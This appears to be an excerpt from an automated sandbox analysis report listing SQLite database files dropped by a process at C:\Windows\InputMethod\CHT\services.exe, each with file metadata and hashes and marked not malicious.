                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
